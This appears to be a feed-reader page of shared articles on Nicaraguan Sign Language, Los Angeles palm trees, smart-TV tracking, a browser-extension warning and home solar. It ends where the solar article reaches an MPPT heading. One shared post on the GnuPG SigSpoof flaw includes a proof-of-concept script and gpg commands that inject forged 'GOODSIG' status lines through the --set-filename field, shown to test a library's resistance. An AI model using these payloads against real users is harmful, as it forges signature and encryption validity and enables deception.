security research, software archaeology, geek of all trades
377 stories
·
7 followers

How Deaf Children in Nicaragua Created a New Language

1 Share
article-image

Of all the changes within Nicaragua to come out of the overthrow of the Somoza regime by the Sandinistas in 1979, perhaps the least anticipated was the birth of a new language. Nicaraguan Sign Language is the only language spontaneously created, without the influence of other languages, to have been recorded from its birth. And though it came out of a period of civil strife, it was not political actors but deaf children who created the language’s unique vocabulary, grammar, and syntax.

When the Sandinista National Liberation Front gained power, they embarked on what has been described as a “literacy crusade,” developing programs to promote fluency in reading Spanish. One such initiative was opening the first public school for deaf education, the Melania Morales Special Education Center, in Managua’s Barrio San Judas. According to Ann Senghas, a professor of psychology at Barnard College who has studied NSL, it was the first time in the history of the country that deaf children were brought together in large numbers.

These children, who ranged in age from four to 16, had no experience with sign language beyond the “home signs” they used with family members to communicate broad concepts. American Sign Language, which has existed since the early 19th century, is used throughout the Americas and is often considered a “lingua franca” among deaf people whose first sign language is a national or regional one. But the first Nicaraguan deaf school did not use ASL or any signs at all. Instead, they focused on teaching children to speak and lip-read Spanish.

article-image

This educational strategy, known as “oralism,” has long been a subject of debate in deaf education, one that was particularly fierce in the United States where ASL originated. Around the turn of the 20th century, some deaf-education advocates believed that the ability to speak and lip-read a language would be more beneficial to deaf individuals than “manualism,” communication via sign language. By learning English, they argued, deaf individuals would be able to fully participate in U.S. society.

English immersion for the deaf was part of a wider effort, epitomized by the eugenics movement, to stamp out differences within the American population. Among the most vocal proponents of eugenics when it came to the deaf community was the inventor of the telephone, Alexander Graham Bell. Bell argued that if deaf people were allowed to communicate via sign language, their isolation from the hearing population would lead to more deaf marriages and, consequently, a larger deaf population.

“Oralism, Bell believed, allowed deaf people to leave their educational and cultural corners and participate in society at large,” writes Brian H. Greenwald, professor of history at the deaf institution Gallaudet University, via email. Bell, Greenwald notes, “used oralism as a form of assimilation.” It was a strategy that Bell hoped would eventually lead to the eradication of deafness in American society.

In Managua in the 1980s, too, though free of the influence of eugenicists, the Sandinistas focus on Spanish literacy resulted in the immersion of deaf students in Spanish speaking and reading skills. But while the country’s deaf children were being taught Spanish inside the classroom, outside the classroom they were spontaneously developing their own method of signed communication.

Though older and younger students attended separate classes during school hours, on buses and playgrounds the children quickly began to select “conventions” for necessary words. Such conventions occur when a community of speakers, who at home may have all used different signs to refer to an object or action, begin to consistently default to using just one, says James Shepard-Kegl. Kegl is co-director of the Nicaraguan Sign Language Project, which administers programs to empower the Nicaraguan deaf community through the use of sign language. “You start building a vocabulary this way,” he says.

article-image

All languages have grammar and syntax, but the first children at Managua’s deaf school had no model for how a language worked because they had been isolated from signed, spoken, and written language all their lives, Shepard-Kegl notes. When the children interacted, instead of adapting their signs to fit an existing language, they developed something unique. While the older students had more life experience, it was actually the younger kids that drove the language’s development. “As you get older, your language instincts tend to diminish,” says Shepard-Kegl. “A lot of those older kids weren’t generating grammar the way little kids did. They copied the grammar the little kids generated.”

No one knows exactly how many individuals are needed to generate a new language or what percentage of those individuals need to be young children. Smaller-scale isolated deaf-education programs had existed previously in 20th-century Nicaragua, Shepard-Kegl says, but the critical mass needed to spontaneously develop Nicaraguan Sign Language only occurred with the opening of Melania Morales. Within a few years, teachers and education officials recognized that something incredible was happening at the school and, in 1986, Nicaragua’s Ministry of Education invited the U.S. linguist Judy Kegl to visit as a deaf-education consultant.

article-image

For Kegl and the other linguists that accompanied her after the initial visit, the opportunity to identify and study Nicaraguan Sign Language was “extremely rare,” writes Senghas in her 1995 MIT doctoral dissertation, Children’s Contribution to the Birth of Nicaraguan Sign Language, which focuses on the years she spent working with Kegl. (Kegl is today co-director of the Nicaraguan Sign Language Project and married to Shepard-Kegl.) It’s an opportunity that owes much to the birth of NSL occuring in the 1980s, when researchers had access to video cameras and could accurately record exactly what was happening. “To my knowledge,” Senghas writes, “there has not been another case of linguists and psycholinguists documenting the birth of a language on a community-wide scale.”

This is not to say, however, that other independent community-based sign languages never existed. In fact, the linguistic world is rich with a wide variety of mutually unintelligible signed languages. Though American Sign Language and some other widely utilized sign languages, such as Chinese Sign Language and Indo-Pakistani Sign Language, have long histories, they were often inaccessible to deaf families and institutions in rural, mountainous, or politically-charged regions. In order to communicate manually, these communities had to develop their own signed languages. For example, in early-to-mid-20th century Jim Crow-era Raleigh, North Carolina, under-resourced and pedagogically isolated African-American deaf schools independently developed unique languages, says Susan Burch, an American Studies professor at Middlebury College. It’s something that has occurred many times in history.

Nicaraguan Sign Language similarly developed in a vacuum. Whereas American Sign Language could have extended into Nicaragua by the 1980s, as it did in neighboring Costa Rica where it combined with a locally developed sign language in the 1960s, Nicaragua’s geo-political isolation prevented ASL from entering the country, notes Shepard-Kegl. Not only did this allow for the independent creation of Nicaraguan Sign Language, but it helped the nascent form of communication to survive.

article-image

Around the world, deaf sign languages, including the one spoken among African Americans in Raleigh, have disappeared or changed significantly when a more widely used language has entered the region. Linguists refer to this displacement as “linguistic imperialism.”

It is a concept that has generated considerable controversy. Some linguists feel that the “contamination” of a local language by a more globally dominant one results in the marginalization of a native community because it supplants the indigenous form of communication with something from outside. Others believe that when dominant languages arrive, they are appropriated by indigenous communities, often combining with an existing language to create a distinctly local version. Deaf Costa Ricans born prior to the 1960s, for example, primarily use what is referred to as Old Costa Rican Sign Language. When ASL arrived in the country after the 1960s, its appropriation by the deaf community resulted in the creation of New Costa Rican Sign Language (sometimes called Modern Costa Rican Sign Language), around 60 percent of which is made up of ASL signs.

In Nicaragua today, changes in technology and communication have led to the increased use of American Sign Language within the deaf community. While ASL has not replaced the pristine, isolated NSL of the 1980s, which still dominates deaf education there, Nicaraguan Sign Language has begun a natural process of integrating elements of ASL. “Languages, by nature, borrow,” says Shepard-Kegl. “They either borrow or they perish.”

For all that linguists have learned from the study of Nicaraguan Sign Language, perhaps most important is the proof it has provided for a controversial theory of language. In the 1960s, Noam Chomsky suggested that children are born with an innate ability to learn human language. Babies are not given grammar lessons and yet they reliably learn grammar because they have inherent expectations about how languages function, says Shepard-Kegl. Kids “don’t know what the [grammatical] rule is but [they] expect that there is a rule.” In Managua’s first deaf school, there was no model and no one to guide the children in sign language and still a language was created in a way never observed before.

Read the whole story
zwol
8 days ago
reply
Pittsburgh, PA
Share this story
Delete

Why Are There Palm Trees in Los Angeles?

1 Share

Let’s go back in time, to Los Angeles in 1875. Here’s what you see: basically nothing. The town—and “town” is even sort of grand for what it was—has about 8,000 people in it. But here’s something weirder: there are no palm trees. As a matter of fact, there aren’t really any trees at all. This area is just sort of a scrubland desert.

Over the next 50 years, palm trees would become a major transformative force in the development of Los Angeles. This is despite the fact that they don’t really do anything. The trees of urban Los Angeles do not provide shade or fruit or wood. They are lousy at preventing erosion. What they do, and what they did, is stranger: they became symbols.

article-image

There is a single species of palm native to the entire state of California, the California fan palm, which is a big one with what looks like a fuzzy beard of brown leaves underneath its green fronds. It’s naturally found around desert oases in the Colorado Desert. (The Colorado Desert is not in Colorado, but is named for the river. Joshua Tree National Park is there.) The native people of that area, the Cahuilla, used it pretty liberally; palm fronds are incredibly strong and heavy, which makes them good for building. But compared with the East Coast palms—there are 12 species native to Florida—the West Coast was, until very recently, basically barren of these trees. Plants. Tall grass things. Wait, what are palms, exactly?

One first weird thing in a very long list of weird things about palms is that they are not really trees. The word “tree” is not a horticultural term—it’s sort of like “vegetable,” in that you can kind of call anything a vegetable—but palms are not at all like the other plants commonly referred to as trees. They don’t have wood, for one thing; the interior of a palm is made up of basically thousands of fibrous straws, which gives them the tensile strength to bend with hard tropical windstorms without snapping. They are monocots, which is a category of plant in which the seed contains only one embryonic leaf; as monocots, they have more in common with grasses like corn and bamboo than they do with an oak or pine tree.

Southern California might not have been rich with trees, but it was rich with money and rich with sunshine. Once the railroads came to Los Angeles, in the 1880s, speculators realized this huge empty sunny place would be a great opportunity to sell land. But how to get people to move way out to the desert? One way was incredibly cheap train tickets; the railroads sold tickets from the Midwest for as little as one dollar. But, as with California ever since, the place had to be marketed.

article-image

There are only two palm species native to Europe; one is a little shrub, and the other is restricted to a few Mediterranean islands. Because they were not common, palms have for centuries had a strange pull for people who didn’t grow up around them. “In the Western imagination, palms for a very very long time were associated with that part of the world that, depending on your point of view and your time in history could be called the Orient, or the Far East, or the Middle East, or the Levant, or the Holy Land, or the Ottoman world, or the Turkish world,” says Jared Farmer, the author of the definitive book on California foliage, Trees in Paradise.

Palms grow freely in the Middle East, and this part of the world always had major religious associations for Westerners, most of whom, for a long time, followed Christianity, Judaism, or Islam—all of which have their holiest sites there. Palms themselves are used in those religions: Jews use them during Sukkot for waving rituals, Christians during Palm Sunday often folded into crosses. The Prophet Mohammed talks about date palms a lot, even if the plant doesn’t have as prominent a role in the rituals of Islam.

The original reason that palms were planted in the New World was for use during Palm Sunday; Catholic missionaries in Florida and California, finding themselves in a place with a hospitable climate for palms, planted them around their missions. But the missionaries are not responsible for the mass of palms in Los Angeles.

article-image

Up until the mid- to late-19th century, the French Riviera was sparsely populated. But popular writers began traveling there, and found it was pretty nice. That, coupled with a trendy new health fad in which time in a dry warm climate is supposed to have good effects on the body, increased its popularity. Immediately developers moved there and began building it up. Palms, already a symbol of warmth from the Middle East, were ideal for this kind of rapid development.

Remember how palms aren’t like other trees? One way is that they’re outrageously easy to move around: they don’t have elaborate root systems like oak trees, but instead a dense yet small root ball. This can be pretty easily dug up and transported, then planted, and palms are not particular about where they are, as long as they have sun and water. To make things easier for developers, palms, being more like grasses than trees, don’t demonstrate all that much difference between individuals; one Mexican fan palm is pretty much like the next. And if you’re a developer, consistency and ease of transportation is a fantastic combination: you can line the streets with them, or plant one on each side of an entrance! And it’s cheap and easy and looks festive. Plus, it has this preexisting association in the minds of your customers (who, in the case of the early French Riviera, were mostly British) with warmth and exoticism.

Palms, though they weren’t native to the Riviera, became indelibly associated with it. And the American developers eyeing Southern California got some ideas. Hey, they thought. This big chunk of desert-y scrubland we own is not that dissimilar from the Mediterranean sites of the Riviera. What if we took a page from their book, and started branding Los Angeles?

article-image

Los Angeles, for what it’s worth, wasn’t the only place to try copying the French Riviera. The British tried it too, in a place called Torbay, although even in the far south of England it’s just not warm enough for palms to really thrive. They did their best, though, with a palm called the New Zealand cabbage palm, planted all over the area. It’s basically a shrub.

Anyway, palms took off as a symbol of wealth, luxury, nice weather, vacation. The ease of growing them in containers meant that palms were found on luxury ships like the Titanic and Lusitania. Robber barons, fancy hotels, and magnates in San Francisco—a much older city than Los Angeles—planted them in “palm courts,” a sort of atrium/ballroom featuring lots of palms and probably a string quartet.

“What LA adds to that, which no city, no people had ever thought to do before, and maybe for good reason, is to plant palms systematically as street trees,” says Farmer. The young city, wanting to attract people to a world of sunshine and cars, planted tens of thousands of palm trees. And they weren’t just on big boulevards: Los Angeles planted them everywhere. Tiny residential streets, parks, anywhere. Places designed for tourists—boardwalks, beaches, wealthy hills, even sports arenas like Staples Center, where the Lakers and Clippers basketball teams play—were especially tended to. And they made sure the palms were watered.

article-image

Palm trees were the only non-natives that the early planners of Los Angeles planted. They also planted lots of citrus trees, pepper trees, and eucalyptus, all of which were supposed to evoke this Mediterranean feel. But it was the palms that really took off.

This experiment yielded some very strange results. The palms thrived in Los Angeles—Farmer described seeing them growing in cracks in the asphalt in abandoned lots—and one species in particular, the Mexican fan palm, grew enormous. The Mexican fan palm is native to Northern Mexico; it’s that incredibly tall skinny one with the little fronds high up above. “Nobody knew they would grow so tall; they grow taller in LA than they would in the wild. They're the tallest palms in the history of the world, at least that we know of,” says Farmer.

They are, in fact, taller than most buildings in Los Angeles. The city has always been a sprawling, low-slung city, with few buildings over two stories tall. It spread horizontally rather than vertically, partially due to the cheap abundant land and partially because Los Angeles was always an automotive city. Unlike in other cities, the great skyscrapers of Los Angeles are not huge buildings: they’re trees.

article-image

Once the palms were firmly ensconced in Los Angeles, the movie and TV industry popularized them. The palms, despite not being native to LA and in fact only having recently arrived there, became the most iconic image of the city. Every awards show, every red carpet, every movie and show shot in Southern California included palm trees. The city expanded like crazy; the population went from 11,000 in 1880 to over 1.2 million only 50 years later.

Urban trees do actually have jobs, besides just looking nice: they provide shade, reduce heat, clean the air, some prevent erosion, and some produce an edible or useful material. Palms in Los Angeles do not do any of this. Their job was not to be good urban trees; it was to create an image of a new kind of city and convince people from elsewhere to come to Los Angeles. They succeeded at that! But with the first batch of trees now dying out due to old age and an array of pests and diseases, Los Angeles is making some changes. Replacement palms are more likely to be more drought-tolerant and provide more shade, like the Chilean palm. But, says Farmer, Los Angeles is not likely to ever let palms completely vanish.

Read the whole story
zwol
15 days ago
reply
Pittsburgh, PA
Share this story
Delete

Smart TVs in Millions of U.S. Homes Track Everything Users Watch

1 Comment and 3 Shares

Sapna Maheshwari, New York Times:

Still, David Kitchen, a software engineer in London, said he was startled to learn how Samba TV worked after encountering its opt-in screen during a software update on his Sony Bravia set.

The opt-in read: “Interact with your favorite shows. Get recommendations based on the content you love. Connect your devices for exclusive content and special offers. By cleverly recognizing onscreen content, Samba Interactive TV lets you engage with your TV in a whole new way.”

[…]

“The thing that really struck me was this seems like quite an enormous ask for what seems like a silly, trivial feature,” Mr. Kitchen said. “You appear to opt into a discovery-recommendation service, but what you’re really opting into is pervasive monitoring on your TV.”

[…]

Jeffrey Chester, executive director of the Center for Digital Democracy, said few people review the fine print in their zeal to set up new televisions. He said the notice should also describe Samba TV’s “device map,” which matches TV content to mobile gadgets, according to a document on its website, and can help the company track users “in their office, in line at the food truck and on the road as they travel.”

Do people truly want to be tracked for advertising purposes by nearly every device that they interact with? Survey after survey for years has indicated that they do not, yet we seem to have shrinking opportunities to object to it. Nearly every TV you’ll find at an electronics store today is a smart TV, and many of them have some form of this kind of tracking built in. The number of ways we’re being tracked on the web has exploded, and the number of companies that trade and collect that information in bulk keeps going up.

This is all buried in multi-thousand-word privacy policies that are not reasonable for the average user to read and interpret correctly. This is one reason I’m so supportive of GDPR — even though it doesn’t adequately regulate behavioural data collection, it does at least require full disclosure of privacy-intrusive practices to allow users more control the sharing of their data.

Technology companies are increasingly not operating in users’ best interests because users have few options besides disconnecting entirely.

Maheshwari, continued:

The Times is among the websites that allow advertisers to use data from Samba to track if people who see their ads visit their websites, but a Times spokeswoman, Eileen Murphy, said that the company did that “simply as a matter of convenience for our clients” and that it was not an endorsement of Samba TV’s technology.

As I wrote in April, website administrators have a responsibility to their users — and, in the Times’ case especially, their paying subscribers — to be careful with their website’s third-party data collection and sharing practices. Their agreement with Samba is an implicit endorsement that advertisers can target their users with data collected in an ethically-dubious manner.

Read the whole story
zwol
15 days ago
reply
I’m really not looking forward to the inevitable day when I have to replace my nice reliable dumb TV, purchased 2008. It only ever gets used as a computer monitor so maybe I can just buy a computer monitor.
Pittsburgh, PA
MotherHydra
14 days ago
I hope monitors get big enough. I still haven't seen black levels on par with Panasonic's plasma sets.
acdha
15 days ago
reply
Washington, DC
Share this story
Delete

Pretty Bad {Protocol,People}

1 Share

tl;dr: This vulnerability affects GnuPG and several plugins and wrapper libraries, including Vinay Sajip’s “python-gnupg” which I rewrote many years ago after finding a shell injection vulnerability in his code. His code is vulnerable to SigSpoof; mine isn’t.

Markus Brinkmann, a NeoPG developer, wrote about a recent signature spoofing vulnerability in GnuPG which carried over into several downstream plugins and wrapper libraries—largely due to GnuPG’s interface design which uses file descriptors, and only file descriptors, to speak a custom, potentially binary but often ascii, order dependent line protocol, whose line order, keywords, number of fields, and other details are subject to change between minor point versions of GnuPG. If that sounds like a special hell invented by some sort of unholy crossing between RMS and a rabid howler monkey: welcome to working with (or rather, more likely, around) the Terrible Idea Generator known as the GnuPG development team.

As previously mentioned, while working with Riseup¹ folks on a project, we found a shell injection vulnerability in Vinay Sajip’s python-gnupg module (the one that installs if you do pip install python-gnupg; mine installs with pip install gnupg). The fix was not merely to remove shell=True argument passed to a call to subprocess.Popen() as Vinay believed (and continues to believe)—but instead, to sanitise all inputs and whitelist available options. There are hundreds of flags to the gnupg binary. Some flags and options are safe. Others can be, if you carefully sanitise their arguments. Others must be disallowed entirely.

My python-gnupg module isn’t vulnerable to SigSpoof, for several reasons:

  1. --no-options is passed by default. So if you’ve got something stupid in your gpg.conf file, you’ll still be fine while using my Python module.

  2. --verbose is not passed. This means that my library doesn’t have to wade throught a mixture of strange stderr and GnuPG status-fd messages on the same file descriptor. You could pass --verbose to it manually, as it is in the list of allowable, whitelisted options, but the exploit still won’t work, which brings us to our next point:

  3. All inputs to, and outputs from, the gnupg binary are sanitised and then forced to conform to whitelists. This means that, even if you did pass --verbose manually, the filename trick won’t work because there’s no way to safely sanitise a filename, because filenames may be arbitrary bytes.

Amusingly, the front page of Vinay’s current documentation states:


Which beautifully demonstrates that Vinay still doesn’t understand the original bug report. Additionally, not a single line of his original code remains unchanged, as the bulk of it was badly written and contained hidden landmines.

At the time I pointed out the vulnerability, Vinay argued that it wasn’t a bug until a working exploit for a Bitcoin exchange C&C server, which was unfortunately running his code, was released. Vinay released several versions of his library at the time, without making the version controlled repo available, meaning that for each new version he claimed to have “fixed the bug”, I had to diff the tarballs to discover, unsurprisingly, that he had, in fact, not.

I find it difficult to convey how thoroughly unimpressed I am with men like Vinay. I volunteered the work, handed him an explanation and a solution, and was ridiculed, told I was wrong, that I didn’t understand, and ignored. He’s still never credited me by name anywhere for finding the original bug. Men like this make me want to go write closed source code that none of you will ever see, just so that I never have to deal with these GNU/Beardos ever again. Have fun with the bugs, Vinay, they’ll certainly keep coming.

Test it yourself

Here is a script which will print the status-fd output of GnuPG and test a spoofed signature (PoC #1), a spoofed signature plus a falsely encrypted (i.e. appears to have been encrypted to the user, when in fact no encryption was used) message (PoC #2), and an additional method for signature spoofing (PoC #3):

    #!/usr/bin/env python
    #
    # Test whether python-gnupg (https://github.com/isislovecruft/python-gnupg),
    # is vulnerable to SigSpoof.
    #
    # Authors: isis agora lovecruft 

    from __future__ import print_function

    import gnupg

    # Set the gnupg log level to `--debug-level=guru` (lmao).
    log = gnupg._logger.create_logger(9)
    log.setLevel(9)

    # Create our gpg instance
    gpg = gnupg.GPG(binary="/usr/bin/gpg2")

    poc1msg = '''\
    -----BEGIN PGP MESSAGE-----

    hQIMAwxKj89n7yVcARAAkhbztv+rjtUZx4rSqpvlj8a9g+y+8ZOY8JhBFvJzVAXe
    tnBNDGmIAc9I9ewRgxwsgcCIlUuGYCSgFugWLYVPD+e0tyQwx76mpMZc5wqAMows
    mk2pavdYMD2FGePY9mCVDvpC8ldumVn2dgT0k2IIOVr8w29CRgzP8ONwAyFFr4Gw
    hZ82e+CLKMFOv7Aigp00D1esurNTzFN5MDJZqhQtPpXawexUjrl5GEsPtKLDkKyt
    iOR5HauLLlDPZJXhHqwrqbSKTpKJU9lztmFp3XVom6VgeCiHWcL0mYF2fcbzfJS/
    CjDFZqFmFPGUJSpdgDcGEGsalzk6o8RFtUvvmKtQLN9BglpYkyPXQiO8vCyS4xiN
    D0gjBxVSvvkdS7734FYxePkUDEOTQbPuJ+FzgMN6Jpp8hVopYbefVcU5bNIY4H2P
    9EAHgvX1AT+VtPPt0JxzQ5/UdXK5KE7O7zUtTJIkXd4hGFpWyZp8hTUEgqLHfHUw
    Qlso2hQ+xgqok1ruGRjYk7n48Uw89jYpBXCOJerZeQGrmGWEkuf1vonFVwddM/4p
    msPN9I6Ahf+Uth+U5rFO4Y2G5fk83saa6ZfM9qdZKgLLEOgXmyycAdSAq/vRRe1G
    z9W77qcuIdhi2dA6+CJBqkm97aYNvoQ4Mxt97e7nP5WijXwugumdMQ7oT1upIsbS
    wFQBov2rvuwWsqrw+kbPD+zedi0NP31BohjiEhBamohGkkh8gr4hPmiyJdm0TIfh
    GBo5z35kRQiJZ9DwmgxE+LnVWQvChEJt0NFuC5FqM5bBaOjR5b2QsYn5uZ5AnVTa
    OZj5HBaaZQqZod5FrGpVpmXG2+RThge8dCbx+CDdBWvLq99TppzcN5nGEHYaz41X
    1ZKRcpbUuixBn3juC6HN2iQq9BidAbpVWvTAYD4dH+/aio3fd+3wSCgHQnPRzxg9
    5YaF6XbFYO8ceruOmnzYYEQTBRmlrBbnaug/cDa5Yq4HIWDHRTR9/aK4Y9rcYsoK
    Jm+7ujLey3TsI9qMs3cbcmsZbnXm+v3uDLvGBofG/dAjqVvm074=
    =UN+a
    -----END PGP MESSAGE-----
    '''

    result1 = gpg.verify(poc1msg)
    print("[poc1] Was the spoofed signature valid? %r" % result1.valid)

    poc2msg = '''\
    -----BEGIN PGP MESSAGE-----

    y8BvYv8nCltHTlVQRzpdIEdPT0RTSUcgRjJBRDg1QUMxRTQyQjM2OCBQYXRyaWNr
    IEJydW5zY2h3aWcgPHBhdHJpY2tAZW5pZ21haWwubmV0PgpbR05VUEc6XSBWQUxJ
    RFNJRyBGMkFEODVBQzFFNDJCMzY4IHggMTUyNzcyMTAzNyAwIDQgMCAxIDEwIDAx
    CltHTlVQRzpdIFRSVVNUX0ZVTExZCltHTlVQRzpdIEJFR0lOX0RFQ1JZUFRJT04K
    W0dOVVBHOl0gREVDUllQVElPTl9PS0FZCltHTlVQRzpdIEVOQ19UTyBBM0FEQjY3
    QTJDREI4QjM1IDEgMApncGc6ICdbIaFeU2VlIHlvdSBhdCB0aGUgc2VjcmV0IHNw
    b3QgdG9tb3Jyb3cgMTBhbS4K
    =Qs3t
    -----END PGP MESSAGE-----
    '''

    result2 = gpg.decrypt(poc2msg)
    print("[poc2] Was the spoofed signature and encryption valid? %r"
          % result2.valid)

    poc3msg = '''\
    -----BEGIN PGP MESSAGE-----

    owJ42m2PsWrDMBiE9zzF1Uu2YDmJZYcQasV2oLRLHegQOij4txC1rGBZQ1+lT9M9
    79O5gkAppceNd8d318/H85dxaj5TF7VBo9UgJz8SjGwJR09gCR78gCRmGWK2CU7W
    KJ6wr5rjrfRH3ulB4bkp8EbvYDFfVnxViWUmyrRk+Yqne1FnVZGXos5rwVNWpJz/
    O6Wd8zQiOuu+v6euW9hRRbfkwdoW7ge3G61B9BJyWhoI3waGyQ7Y/q7uIpw63/ev
    mIfLp7vrhyGaYAhyCqDSzL4B9fBP7w==
    =zQV0
    -----END PGP MESSAGE-----
    '''

    result3 = gpg.verify(poc3msg)
    print("[poc3] Was the spoofed signature valid? %r" % result3.valid)

The GnuPG blobs were generated with (via Markus Brinkmann’s suggestions):

## PoC #1
echo 'Please send me one of those expensive washing machines.' | \
gpg --armor -r a3adb67a2cdb8b35 --encrypt --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG DB1187B9DD5F693B Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B 2018-05-31 1527721037 0 4 0 1 10 01 4F9F89F5505AC1D1A260631CDB1187B9DD5F693B\
\n[GNUPG:] TRUST_FULLY 0 classic\
\ngpg: '\'`" > poc1.msg

## PoC #2
echo "See you at the secret spot tomorrow 10am." | \
gpg --armor --store --compress-level 0 --set-filename "`echo -ne \''\
\n[GNUPG:] GOODSIG F2AD85AC1E42B368 Patrick Brunschwig <patrick@enigmail.net>\
\n[GNUPG:] VALIDSIG F2AD85AC1E42B368 x 1527721037 0 4 0 1 10 01\
\n[GNUPG:] TRUST_FULLY\
\n[GNUPG:] BEGIN_DECRYPTION\
\n[GNUPG:] DECRYPTION_OKAY\
\n[GNUPG:] ENC_TO 50749F1E1C02AB32 1 0\
\ngpg: '\'`" > poc2.msg

# PoC #3
echo 'meet me at 10am' | gpg --armor --store --set-filename "`echo -ne msg\''\
\ngpg: Signature made Tue 12 Jun 2018 01:01:25 AM CEST\
\ngpg:                using RSA key 1073E74EB38BD6D19476CBF8EA9DBF9FB761A677\
\ngpg:                issuer "bill@eff.org"\
\ngpg: Good signature from "William Budington <bill@eff.org>" [full]
'\''msg'`" > poc3.msg

Again, not vulnerable, for all the reasons described above.

Additionally, if Vinay would have actually understood and fixed the root cause of the original shell injection vulnerability six years ago, his library likely wouldn’t be vulnerable, yet again, today. But of course, the GnuPG community, just like upstream, really only takes patches from men, so it’s neither my problem nor concern that they seem to continually discover new and innovative ways to fuck themselves and their users over.

Please don’t

If you’re a developer thinking of making a new tool or product based on the OpenPGP protocol: please don’t. Literally use anything else. I wrote my version of python-gnupg because, at the time, the project I worked on wanted to make transparently encrypting remailers, i.e. middleware boxes run by an email service provider which users register their encryption keys with, which would—upon seeing a plaintext email to another of the provider’s users—automatically encrypt the email to the user. We used GnuPG for this. This was a mistake, in my opinion, and if I had to do the project again, I would do it entirely differently.

If you’re a developer thinking you can write a less shitty version of GnuPG: please don’t. RFC4880 was a mistake and needs to die in a fire. Also nobody under thirty actually uses email for anything other than signing up for services.

If you’re a user or potential user of GnuPG: please don’t. Try using tools with safer, constant-time cryptographic implementations, better code, nicer and more inclusive development teams, and a better overall user experience, like Signal.

If you’re considering getting into GnuPG development: please don’t. Especially if you’re non-cis-male identified, it’s going to be a complete and infuriating waste of your time and talents. Please consider donating your skills to more inclusive projects with fewer moronic assholes.

Moving forward

There isn’t really any path forward. GnuPG and its underlying libgcrypt remain some of the worst C code I’ve ever read. The code isn’t constant time, and numerous attacks have resulted from this, as the developers scurry to jump through hoops of fire to implement yet another variable-timed algorithm they’ve seemingly come up with on the spot which is vulnerable to a dozen more attacks just not that one from the latest paper. OpenPGP (RFC4480) is one of the worst designs and specifications ever written. I have to spend spots, here and there, of my non-existent free time maintaining a whitelist as the GnuPG developers randomly change their internal, nearly undocumented line protocol, between micro versions. I’d like to not do this. Please, let’s stop pretending this crock of shit provides anything at all “pretty good”: not the cryptographic algorithms, not the code, not the user experience, and certainly not the goddamned IPC design.

There is one way forward: Vinay is annoyed that my library has a similar name, because god forbid a user get tricked into using something more secure. Frankly, I’m sick of Vinay’s trash code being mistaken for mine, and increasingly so, the more vulnerabilities surface in it. So I’ve decided to rename the thing formerly installable with pip install gnupg to pip install pretty_bad_protocol (name thanks to boatspbp rust crate). If you grep for pretty_bad_protocol in a python library which uses gnupg and there’s no results, you’ll know someone’s not being very honest about what gnupg has to offer.


¹ I don’t speak for my current or past employers or clients.

Read the whole story
zwol
15 days ago
reply
Pittsburgh, PA
Share this story
Delete

i’ve seen a lot of posts about it on mastodon but not over here, soif you use the ‘Stylish’ browser...

1 Share

i’ve seen a lot of posts about it on mastodon but not over here, so

if you use the ‘Stylish’ browser extension to make websites not look like shit, you need to backup your themes, uninstall it, install Stylus instead, and import your themes into that

stylish got bought by a company that turned it into spyware

stylus works in exactly the same way, and with all the same themes, without spying on you

uninstall stylish

Read the whole story
zwol
17 days ago
reply
Pittsburgh, PA
Share this story
Delete

Why a Typical Home Solar Setup Does Not Work With the Grid Down - And What You Can Do About It

1 Comment and 2 Shares
During 2017, I saw a lot of news articles talking about how the Evil Power Companies were being Meanie McMean by not letting people with solar panels use them when the grid was down.  The implication (in many news articles) was that these powerless people with solar panels could use them to power their home while the grid was down, if only the evil power company didn't require that solar not work if the grid was down.  The picture painted was one of power company executives, twisting their mustaches, cackling in the glow of their coal fired furnaces, going on about how if they can't deliver power, nobody shall have any power!

That sentiment (and those similar) is somewhere between "showing extreme ignorance of solar" and "actively misleading," depending on the author's knowledge of solar and how it's typically implemented.


So, of course, I'm going to do better.  Because I can.  And because I'm sick of reading that sort of nonsense on the internet.  You will be too, after understanding the issues.


Solar Panels (Are Weird)

Any detailed understanding of solar power requires an understanding of solar panels - because they're the power supply to the entire system.  And, in terms of the available power supplies out there, solar panels are weird.  They're substantially different from anything else, and this impacts how you can use them for grid tied and off grid power.  The biggest problem is that they're very easy to drive into voltage collapse (and therefore power collapse) if you draw beyond the peak power they can produce at the current temperature and illumination.

This is an example IV (current/voltage) curve out of the datasheet from my panels - it's one I had laying around.  The numbers don't matter, because all solar panels work this way - just with different numbers on the scales.


What you're seeing, and what's vital to understand, is that a solar panel will supply a certain current (at any voltage) - up to a certain point.  That current is directly affected by the illumination available (the different W/m^2 curves - that's illumination power per square meter of panel area).  At a certain voltage, the current starts to drop off, and eventually you hit the open circuit voltage (Voc) - the voltage the panel produces when there's no current draw.  The peak power (maximum power point) on the panel comes slightly past the start of the drop in voltage, and the available power drops very rapidly as you go past that point into the voltage collapse.  At both the short circuit point (0V, plenty of amps) and the open circuit voltage (0 amps, plenty of volts), the panels are producing zero usable power.

DigiKey has a great diagram that demonstrates how this works for their particular example panel.  The red curve is the current, and the blue curve is the power.  The dot represents the maximum power point on both curves.  Notice that the power curve to the right of the maximum power point is quite steep - it's not a gentle dropoff.



The curves change absolute values somewhat both with illumination and temperature.  A colder panel will produce a higher voltage, which a good MPPT controller can extract as extra watts in the winter (when you really want all the watts you can get).  Plus, there are curves over the standard 1000W/m^2 illumination you might see in certain conditions that lead to an awful lot of extra power.  When might you see that?  A vertical panel, with snow on the ground, on a bright, sunny winter day.  Also, "cloud edge" effects (the edge of certain cloud formations can focus more light on your chunk of ground than full sun).  In those conditions, a panel will produce more than rated current and voltage, and you'd better have designed for that!  I've seen north of 11A from 9A panels in the winter reflection condition.

My east facing panels, right now, are producing 1.8A at 58V. In these conditions (afternoon shade, but a partly cloudy day), they'd happily provide 1.8A at 12V, 1.8A at 24V, 1.8A at 40V, 1.8A at 60V... right up until I pass the knee in the curve. Open circuit voltage today is 70V (my little PWM controller can tell me this), so peak power is probably right about 57-60V.  And, if I were to try to pull more than 1.8A from them, the voltage would collapse. That's just what they can do right now, aimed as they are.


Swing them around to face the sun, and they're operating at 7.4A at 58V. These panels are connected with a PWM controller (pulse width modulation, or basically a switch that toggles quickly), so they always operate at whatever my battery bank voltage is. That means they're producing more watts when my bank is charging heavily (60V) than empty (48V). But that's the way I hooked them up because it's cheap and plenty good enough for my needs.  Since their peak power comes fairly close to my battery bank voltage, the (small) gains of a MPPT controller don't justify the cost on this secondary array.  But what's MPPT?

MPPT: Maximum Power Point Tracking

